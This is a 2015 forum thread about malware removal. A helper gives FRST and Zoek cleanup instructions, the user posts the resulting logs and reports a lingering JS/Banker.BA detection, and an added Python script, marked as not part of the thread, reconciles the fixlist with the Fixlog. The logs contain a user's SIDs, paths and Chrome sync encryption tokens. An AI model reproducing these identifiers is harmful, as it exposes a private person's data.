Task: {194464DB-C9B5-4BC4-94D8-876FD9FC46D8} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
C:\Windows\AutoKMS
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
  • Launch FRST and press the Fix button just once and wait, the program will automatically launch fixlist.txt.
  • The tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.
===================================================

Zoek by Smeenk

--------------------
  • Download Zoek and save it to your Desktop
  • Right click the icon, select Run as Administrator, and wait for the Program to appear on your Desktop (may take 15 seconds or so)
  • Copy and paste the following into the main box

createsrpoint;
autoclean;
emptyalltemp;
ipconfig /flushdns

  • Verify Scan All Users is selected then click Run Script
  • Do not use your computer while the scan is running
  • When completed a zoek-results.txt report will appear on your desktop. Copy and paste the contents in your reply
===================================================

System Summary Information

--------------------
  • Press the Windows logo key + r on your keyboard at the same time
  • Type msinfo32 and press Enter
  • Left click on System Summary
  • Click File, Save, and name the file Summary
  • Zip and attach the file to your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.
  • Fixlog
  • zoek log
  • System Summary Information
  • Update on computer performance

Gary
 

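A way to read the fixlist in the reply above and the Fixlog that FRST writes after running it, as an added example that is not part of the original post and not a feature of FRST: the `[X]` after a service line and the `No File` after a CustomCLSID line mark registrations whose image file no longer exists (orphaned entries, which is why they can be removed without losing anything), and the Fixlog reports one line per item FRST touched, in directive order. The script below classifies each directive by type, flags the orphaned ones, and matches every directive to the Fixlog lines that mention it, so a fix can be checked for coverage rather than eyeballed. The sample text is the fixlist above and the result section of the Fixlog posted in the next reply; the regular expressions are mine and cover only the entry types that occur there.

```python
"""Classify the directives in an FRST fixlist and check them against the Fixlog
FRST writes after running it. Added example, not part of the thread and not an
FRST feature: the sample text is the fixlist and Fixlog posted in this thread,
the parsing rules are mine and cover only the entry types that occur in them."""
import re

FIXLIST = r"""
S3 catchme; \??\C:\54665465465322111\catchme.sys [X]
S3 MSICDSetup; \??\E:\CDriver64.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2015-08-12 13:15 - 2014-11-26 10:40 - 00000266 _____ C:\Windows\Tasks\AutoKMS.job
CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File
Task: {194464DB-C9B5-4BC4-94D8-876FD9FC46D8} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
C:\Windows\AutoKMS
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
"""

# Result section of the Fixlog that the fixlist above produced (from the thread).
FIXLOG_RESULTS = r"""
catchme => service removed successfully
MSICDSetup => service removed successfully
VGPU => service removed successfully
C:\Windows\Tasks\AutoKMS.job => moved successfully.
"HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}" => key removed successfully
"HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{194464DB-C9B5-4BC4-94D8-876FD9FC46D8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{194464DB-C9B5-4BC4-94D8-876FD9FC46D8}" => key removed successfully
C:\Windows\System32\Tasks\AutoKMS => moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS" => key removed successfully
C:\Windows\AutoKMS => moved successfully.
C:\Windows\Tasks\AutoKMS.job not found.
"""

GUID_RX = re.compile(r"\{[0-9A-F-]{36}\}", re.I)
# "S3 name; image [X]": the trailing [X] means the image file is missing.
SERVICE_RX = re.compile(r"^([SR]\d)\s+([^;]+);\s*(.*?)\s*(\[X\])?$")
# FRST file listing: created - modified - size attributes path.
FILE_RX = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2} - \d{4}-\d{2}-\d{2} \d{2}:\d{2} - \d+ \S+ (.+)$")
# "No File" means the DLL the COM registration points at is gone.
CLSID_RX = re.compile(r"^CustomCLSID:\s*(\S+)\s*->\s*(.*?)(\s+No File)?$")
TASK_RX = re.compile(r"^Task:\s*(?:(\{[0-9A-F-]{36}\})\s*-\s*)?(\S+)\s*=>\s*(.+)$", re.I)
RESULT_RX = re.compile(r'^"?(.+?)"?\s+=>\s+(.+?)\.?$')
NOTFOUND_RX = re.compile(r"^(.+?) not found\.?$")


def classify(line: str) -> dict:
    """Map one fixlist line to its directive type and the key FRST reports on."""
    m = SERVICE_RX.match(line)
    if m:
        return {"kind": "service", "key": m.group(2).strip(), "orphaned": m.group(4) is not None}
    m = FILE_RX.match(line)
    if m:
        return {"kind": "file", "key": m.group(1).strip(), "orphaned": False}
    m = CLSID_RX.match(line)
    if m:
        return {"kind": "clsid", "key": GUID_RX.search(m.group(1)).group(0), "orphaned": m.group(3) is not None}
    m = TASK_RX.match(line)
    if m:
        return {"kind": "task", "key": m.group(2), "guid": m.group(1), "orphaned": False}
    return {"kind": "path", "key": line, "orphaned": False}  # bare file or folder path


def parse_fixlog(text: str) -> list:
    """Return (subject, result) pairs in the order FRST wrote them."""
    results = []
    for line in text.splitlines():
        line = line.strip()
        m = RESULT_RX.match(line)
        if m:
            results.append((m.group(1), m.group(2)))
            continue
        m = NOTFOUND_RX.match(line)
        if m:
            results.append((m.group(1), "not found"))
    return results


def matches(entry: dict, subject: str) -> bool:
    """Services, files and paths are reported by exact name; CLSIDs and
    scheduled tasks by GUID or task path inside a longer registry subject."""
    s = subject.lower()
    if entry["kind"] in ("service", "file", "path"):
        return s == entry["key"].lower()
    if entry["kind"] == "clsid":
        return entry["key"].lower() in s
    guid = entry.get("guid")
    return entry["key"].lower() in s or bool(guid and guid.lower() in s)


def reconcile(fixlist_text: str, fixlog_text: str) -> list:
    """Attach to every directive the Fixlog results that mention it."""
    entries = [classify(l.strip()) for l in fixlist_text.strip().splitlines() if l.strip()]
    results = parse_fixlog(fixlog_text)
    for e in entries:
        e["results"] = [res for subj, res in results if matches(e, subj)]
    return entries


if __name__ == "__main__":
    for e in reconcile(FIXLIST, FIXLOG_RESULTS):
        flag = " (orphaned)" if e["orphaned"] else ""
        print(f"{e['kind']:8} {e['key']}{flag}: {e['results'] or 'NO RESULT'}")
```

Every directive in this fixlist comes back with at least one result. The last one (the AutoKMS.job task) is reported as `not found` because the earlier file directive had already moved the job file, which is the benign reading of a `not found` at the end of an otherwise clean Fixlog; a directive with no result at all is the case worth re-running.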
#5 GiakMind (Topic Starter, Members, 10 posts, Location: Roma, Italy)

Posted 13 August 2015 - 04:41 AM

Everything requested is in the attachment.
After doing every step, JS/Banker.BA still appears when I go to the bank site :(

Fix result of Farbar Recovery Scan Tool (x64) Version:12-08-2015
Ran by Gianluca (2015-08-13 11:19:13) Run:2
Running from D:\Desktop
Loaded Profiles: Gianluca (Available Profiles: Gianluca)
Boot Mode: Normal
==============================================

fixlist content:
*****************
S3 catchme; \??\C:\54665465465322111\catchme.sys [X]
S3 MSICDSetup; \??\E:\CDriver64.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2015-08-12 13:15 - 2014-11-26 10:40 - 00000266 _____ C:\Windows\Tasks\AutoKMS.job
CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File
Task: {194464DB-C9B5-4BC4-94D8-876FD9FC46D8} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
C:\Windows\AutoKMS
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
*****************

catchme => service removed successfully
MSICDSetup => service removed successfully
VGPU => service removed successfully
C:\Windows\Tasks\AutoKMS.job => moved successfully.
"HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}" => key removed successfully
"HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{194464DB-C9B5-4BC4-94D8-876FD9FC46D8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{194464DB-C9B5-4BC4-94D8-876FD9FC46D8}" => key removed successfully
C:\Windows\System32\Tasks\AutoKMS => moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS" => key removed successfully
C:\Windows\AutoKMS => moved successfully.
C:\Windows\Tasks\AutoKMS.job not found.

==== End of Fixlog 11:19:13 ====

Zoek.exe v5.0.0.0 Updated 04-May-2015
Tool run by Gianluca on 13/08/2015 at 11:21:45,63.
Microsoft Windows 7 Ultimate 6.1.7601 Service Pack 1 x64
Running in: Normal Mode Internet Access Detected
Launched: D:\Desktop\zoek.exe [Scan all users] [Script inserted]

==== System Restore Info ======================

13/08/2015 11:23:08 Zoek.exe System Restore Point Created Successfully.

==== Empty Folders Check ======================

C:\PROGRA~2\Sega deleted successfully
C:\PROGRA~2\COMMON~1\SWF Studio deleted successfully
C:\Program Files\ATI Technologies deleted successfully
C:\Program Files\Easeware deleted successfully
C:\PROGRA~3\Origin deleted successfully
C:\Users\Gianluca\AppData\Roaming\Media Player Classic deleted successfully
C:\Users\Gianluca\AppData\Local\Samsung deleted successfully
C:\Users\Gianluca\AppData\Local\VirtualStore deleted successfully

==== Deleting CLSID Registry Keys ======================


==== Deleting CLSID Registry Values ======================


==== Deleting Services ======================


==== Deleting Files \ Folders ======================

C:\PROGRA~2\Sega not found
C:\PROGRA~2\SystemRequirementsLab deleted
C:\PROGRA~2\MiPony deleted
C:\Users\Gianluca\AppData\Roaming\Mipony deleted
C:\PROGRA~3\Package Cache deleted
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MiPony deleted
C:\Users\Gianluca\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MiPony deleted
C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default\jetpack deleted
C:\Users\Gianluca\Desktop\MiPony.lnk deleted
C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default\extensions\abs@avira.com deleted
"C:\Users\Gianluca\AppData\Roaming\Ebbaz\ybpi.die" deleted
"C:\Users\Gianluca\AppData\Roaming\Ebbaz\ybpi.die.0" deleted
"C:\Users\Gianluca\AppData\Roaming\Ebbaz" deleted

==== Firefox Start and Search pages ======================

ProfilePath: C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default
user_pref("browser.startup.homepage", "http://www.google.it/");

==== Firefox Extensions ======================

ProfilePath: C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default
- Firebug - %ProfilePath%\extensions\firebug@software.joehewitt.com.xpi
- Video DownloadHelper - %ProfilePath%\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi
- Adblock Plus - %ProfilePath%\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
- QuickJava - %ProfilePath%\extensions\{E6C1199F-E687-42da-8C24-E7770CC3AE66}.xpi

ProfilePath: C:\Users\Gianluca\AppData\Roaming\TomTom\HOME\Profiles\fl8mml8x.default
- Undetermined - C:\Program Files (x86)\TomTom HOME 2\xul\extensions\MapShare-status@tomtom.com
- Undetermined - C:\Program Files (x86)\TomTom HOME 2\xul\extensions\baseTheme@tomtom.com

AppDir: C:\Program Files (x86)\Mozilla Firefox
- Default - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

==== Firefox Plugins ======================

Profilepath: C:\Users\Gianluca\AppData\Roaming\Mozilla\Firefox\Profiles\bv56la9c.default
FD82108FD60B63010325D9AF6F00AF99 - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_209.dll - Shockwave Flash
1F352B5944AF5C2204D9EFF7F845C5AF - C:\Users\Gianluca\AppData\Local\Google\Update\1.3.28.1\npGoogleUpdate3.dll - Google Update
3CD19649B2C3023D65E67C056457A2BC - C:\Users\Gianluca\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll - Facebook Video Calling Plugin


==== Chromium Look ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
flliilndjeohchalpbbcdekjklbdgfkk - No path found[]

AdBlock - Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom
Bookmark Manager - Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik
Chrome Hotword Shared Module - Gianluca\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg
AdBlock - Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gighmmpiobklfepjocnamgkkbiglidom
Chrome Hotword Shared Module - Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lccekmodgklaepjeofjdjpbminllajkg
Chrome Hotword Shared Module - Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lccekmodgklaepjeofjdjpbminllajkg

==== Chromium Startpages ======================

C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Preferences
"homepage": "https://www.google.it/",
"startup_urls": [ "https://www.google.it/" ]

C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Preferences
},"http://www.vvvvid.it:80,http://www.vvvvid.it:80":{"setting":1},"https://[*.]www.youtube.com:443,*":{"setting":1},"https://player.vimeo.com:443,https://www.facebook.com:443":{"setting":1},"https://www.facebook.com:443,https://www.facebook.com:443":{"setting":1}},"geolocation":{"https://locator.unicredit.it:443,https://locator.unicredit.it:443":{"setting":2}},"images":{},"javascript":{},"media_stream":{},"media_stream_camera":{},"media_stream_mic":{},"metro_switch_to_desktop":{},"midi_sysex":{},"mixed_script":{},"mouselock":{},"notifications":{},"plugins":{},"popups":{},"ppapi_broker":{},"protocol_handlers":{},"push_messaging":{},"ssl_cert_decisions":{}},"pattern_pairs":{"http://www.altadefinizione01.com:80,http://www.altadefinizione01.com:80":{"fullscreen":1},"http://www.hdpass.link:80,http://altadefinizione.click:80":{"fullscreen":1},"http://www.vvvvid.it:80,http://www.vvvvid.it:80":{"fullscreen":1},"https://[*.]www.youtube.com:443,*":{"fullscreen":1},"https://player.vimeo.com:443,https://www.facebook.com:443":{"fullscreen":1},"https://www.facebook.com:443,https://www.facebook.com:443":{"fullscreen":1}},"pref_version":1},"created_by_version":"42.0.2311.135","exit_type":"Normal","exited_cleanly":true,"gaia_info_picture_url":"https://lh4.googleusercontent.com/-p4L0SliQl0o/AAAAAAAAAAI/AAAAAAAAACw/mYcIbIbcATk/s256-c/photo.jpg","gaia_info_update_time":"13083890127732776","icon_version":3,"managed_user_id":"","managed_users":{},"migrated_content_settings_exceptions":true,"migrated_default_content_settings":true,"migrated_default_media_stream_content_settings":true,"name":"Primo 
utente","per_host_zoom_levels":{}},"protection":{"macs":{}},"reverse_autologin":{"enabled":false},"savefile":{"default_directory":"D:\\Desktop"},"selectfile":{"last_directory":"D:\\Desktop"},"session":{"restore_on_startup_migrated":true,"startup_urls_migration_time":"13075464209545299"},"shelf_chrome_icon_index":1,"signin":{"signedin_time":"13075464368221488"},"sync":{"app_list":true,"app_settings":true,"apps":true,"autofill":true,"autofill_wallet":true,"bookmarks":true,"dictionary":true,"encryption_bootstrap_token":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAsDJUJFfmDEGhhp3hEMBBzwAAAAACAAAAAAAQZgAAAAEAACAAAACpk18AZrxuJMcUEnvDZ17fmyaNT2PApnpEHQOjYRx3oQAAAAAOgAAAAAIAACAAAADLurwIlsJz/lcaRE3upgBgKbWefAYCIb3c9NCN3N76DkAAAAAZoMrVpWc0Jo5Fs1OteuGeyqcQQPbnSOLjC99+WmYm2p55TwTHzrxF8CfFUqZYFlfTNJJQ4niy3PmPCKSpHQkTQAAAAOi59yY2nwwC+AmTfkN+aFOqYg5xWLiYlGb5ktLExiZLm/2yOplORqftn6Hi16gkDgUO7huJzgRRW4BMNq2AnzQ=","extension_settings":true,"extensions":true,"favicon_images":true,"favicon_tracking":true,"first_sync_time":"13075464368233120","has_setup_completed":true,"history_delete_directives":true,"keystore_encryption_bootstrap_token":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAsDJUJFfmDEGhhp3hEMBBzwAAAAACAAAAAAAQZgAAAAEAACAAAAD5dvQZyZElhpA9x/mupCBk5uIy7luGan2EceqUfL/QnQAAAAAOgAAAAAIAACAAAABFtnF2pRk8doAkL46L599ZbUh/tqPpHoMioR07L1HBNFAAAAAuejhPY+Sv/7QUYHG8iAo1lVxdKST4A9dTUomtuzYs8fmak4owOihird7jRS+lX6qQp+nBGfKZ5D1Ymv16HAsVVuE0scrbtd4pP7mA4/Jc3UAAAAC3ZUU7srjmrVVBNUlw9tyvtXr5+PHqhcPFU2B/la0kApQYqsXO1DJRzJV5+6ETP0rjDxVIZWNm9YSBHaBQIx1V","last_synced_time":"13083931231902819","managed_user_settings":true,"managed_user_shared_settings":true,"managed_user_whitelists":true,"managed_users":true,"memory_warning_count":0,"passwords":true,"preferences":true,"priority_preferences":true,"search_engines":true,"session_sync_guid":"session_synclqTQsidpB2pCdhj4dDTvJg==","sessions":true,"shutdown_cleanly":true,"suppress_start":false,"tabs":true,"themes":true,"typed_urls":true},"sync_promo":{"startup_count":2},"translate_acce
pted_count":{"cs":0,"en":0,"es":0,"fr":0,"it":0,"und":0},"translate_blocked_languages":["it"],"translate_denied_count":{"en":0,"es":13,"it":1,"und":1},"translate_denied_count_for_language":{"cs":1,"en":2,"fr":1},"translate_last_denied_time":1430996301614.406,"translate_last_denied_time_for_language":{"cs":1439400036626.1,"en":1439115108072.135,"fr":1439119182508.963},"translate_too_often_denied":true,"translate_too_often_denied_for_language":{"en":true},"translate_whitelists":{},"zerosuggest":{"cachedresults":""}}
mieda":"F6C3643F5662214591A4902952CA6A7FF8CA9B727E37619C88C528503CA661CF","pafkbggdmjlpgkdkcbjmhmfcdpncadgh":"B9E84D725DF0031C5392203EA9563002612BCAF0F7BCF57190B5914B2492BD06","pjkljhegncpnkpknbcohdijeoejaedia":"9BF7BD30FEA2833C7D2288B7C7DFB6B3288FF63B1D810AB69FDF9DFA80A2683C"}},"google":{"services":{"account_id":"719032B1BE59CE0CAC06D2E76784CFE5873DC978078F7603A5C683668AA80981","last_username":"A6EC537858565BA3AA4E8764B710F5261953BF0652311FCED43FC6ACDA1BFCD1","username":"BD42B9F1F9EE61654A3F9583D5300C93C0FBC3041F9E05F2CC2D080298255F0E"}},"homepage":"CC692BC2683A241E4560C1455E2F5D1868AE9893F6CDA34CB9167F0B2691F8AE","homepage_is_newtabpage":"EE7C1583B3E2909D27B4C8501AC687BF73EE938C1A92A37E96CBE7F96AA8CD96","pinned_tabs":"DE73121B89C6F11E20AAF8FEED6A96B94D1C047D6EDB0DB7A120A8D397C92E94","prefs":{"preference_reset_time":"955108F5349848B0143F88A306131CD674C2E9A0D34C4797DA1227D90CC1E272"},"profile":{"reset_prompt_memento":"4A8C588892C444E32CEFDBDBA7E63E4E3DC7A1F9EDAE4E40C7742D10A5D55920"},"safebrowsing":{"incidents_sent":"AC17861092B04C0A791A45503558E5F29DC952F2674E60A4D02E03A00800D8E2"},"search_provider_overrides":"536ECCA8FF81DD98BEDD8237286CE450386F72DEAD3BAD06401603F15CEFA2CB","session":{"restore_on_startup":"7B2FB04F6713ECAB04E326F0B020F7004B17FF998EB3270107F502C6D9671190","startup_urls":"A2664177D4A307B5E496EE46FE5B8E969469E277261021A7C8140FE7EF5E4F37"},"software_reporter":{"prompt_reason":"920F8344B512394E2F2278F2B4D84F26B7DE5AF5D97F4D8D63708A31F6A1C9F1","prompt_seed":"4DDF784F4FA10EE4880ABC9234B9F82E5C7D13222E276D9C54E107F2A40C78D9","prompt_version":"9961D3E48E02EBCCEFC0C2F49350BEFA062A31FD437F4152B53820F437EF8410"},"sync":{"remaining_rollback_tries":"913E8B943F833AEB3DB62E0BC3919FBDEBFF0F14DC5F306E25887D8950D1B811"}},"super_mac":"47C3D67905800C2F4136EC98F37F6DFD40B0DC86567EE83F8CD7838F671629BA"},"session":{"restore_on_startup":4,"startup_urls":["https://www.google.it/?gfe_rd=cr&ei=IQX3U9PyLqmo8wfJqICICg"]},"sync":{"remaining_rollback_tries":0}}


==== Set IE to Default ======================

Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.google.it/"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="res://ieframe.dll/tabswelcome.htm"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="res://ieframe.dll/tabswelcome.htm"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}] not found

New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.google.it/"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="about:newtab"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="about:newtab"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{012E1000-F331-11DB-8314-0800200C9A66}"

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
{012E1000-F331-11DB-8314-0800200C9A66} Google Url="http://www.google.com/search?q={searchTerms}"
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC"

==== Deleting Registry Keys ======================

HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MiPony deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AdobeCS5ServiceManager deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Avira Systray deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KiesPreload deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KiesTrayAgent deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RGSC deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SwitchBoard deleted successfully
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TomTomHOME.exe deleted successfully

==== Empty IE Cache ======================

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\Gianluca\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5 emptied successfully
C:\Users\Gianluca\AppData\Local\Temp\acro_rd_dir\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\serviceprofiles\Localservice\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1UU5CAO9 will be deleted at reboot
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\424GSER4 will be deleted at reboot
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GO4PDM3X will be deleted at reboot
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4UWGBUY will be deleted at reboot
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W5PQH01S will be deleted at reboot
C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1KIYYEWE will be deleted at reboot
C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\424GSER4 will be deleted at reboot
C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LBS3UX9I will be deleted at reboot
C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LT0BAKWL will be deleted at reboot
C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1KIYYEWE will be deleted at reboot
C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\424GSER4 will be deleted at reboot
C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LBS3UX9I will be deleted at reboot
C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LT0BAKWL will be deleted at reboot
C:\Users\Gianluca\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat will be deleted at reboot
C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat will be deleted at reboot
C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat will be deleted at reboot

==== Empty FireFox Cache ======================

C:\Users\Gianluca\AppData\Local\Mozilla\Firefox\Profiles\bv56la9c.default\cache2 emptied successfully

==== Empty Chrome Cache ======================

C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully
C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 1\Cache emptied successfully
C:\Users\Gianluca\AppData\Local\Google\Chrome\User Data\Profile 2\Cache emptied successfully

==== Empty All Flash Cache ======================

Flash Cache Emptied Successfully

==== Empty All Java Cache ======================

Java Cache cleared successfully

==== C:\zoek_backup content ======================

C:\zoek_backup (files=220 folders=65 40912549 bytes)

==== Empty Temp Folders ======================

C:\Users\Default\AppData\Local\temp emptied successfully
C:\Users\Default User\AppData\Local\temp emptied successfully
C:\Users\Gianluca\AppData\Local\Temp will be emptied at reboot
C:\Users\Public\AppData\Local\temp emptied successfully
C:\Windows\serviceprofiles\networkservice\AppData\Local\Temp emptied successfully
C:\Windows\serviceprofiles\Localservice\AppData\Local\Temp emptied successfully
C:\Windows\Temp will be emptied at reboot

==== After Reboot ======================

==== Empty Temp Folders ======================

C:\Windows\Temp successfully emptied
C:\Users\Gianluca\AppData\Local\Temp successfully emptied

==== Empty Recycle Bin ======================

C:\$RECYCLE.BIN successfully emptied

==== Deleting Files / Folders ======================

"C:\Users\Gianluca\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat" not found
"C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat" not found
"C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat" not found
"C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1UU5CAO9" not deleted
"C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\424GSER4" not deleted
"C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GO4PDM3X" not deleted
"C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4UWGBUY" not deleted
"C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W5PQH01S" not deleted
"C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1KIYYEWE" not found
"C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\424GSER4" not found
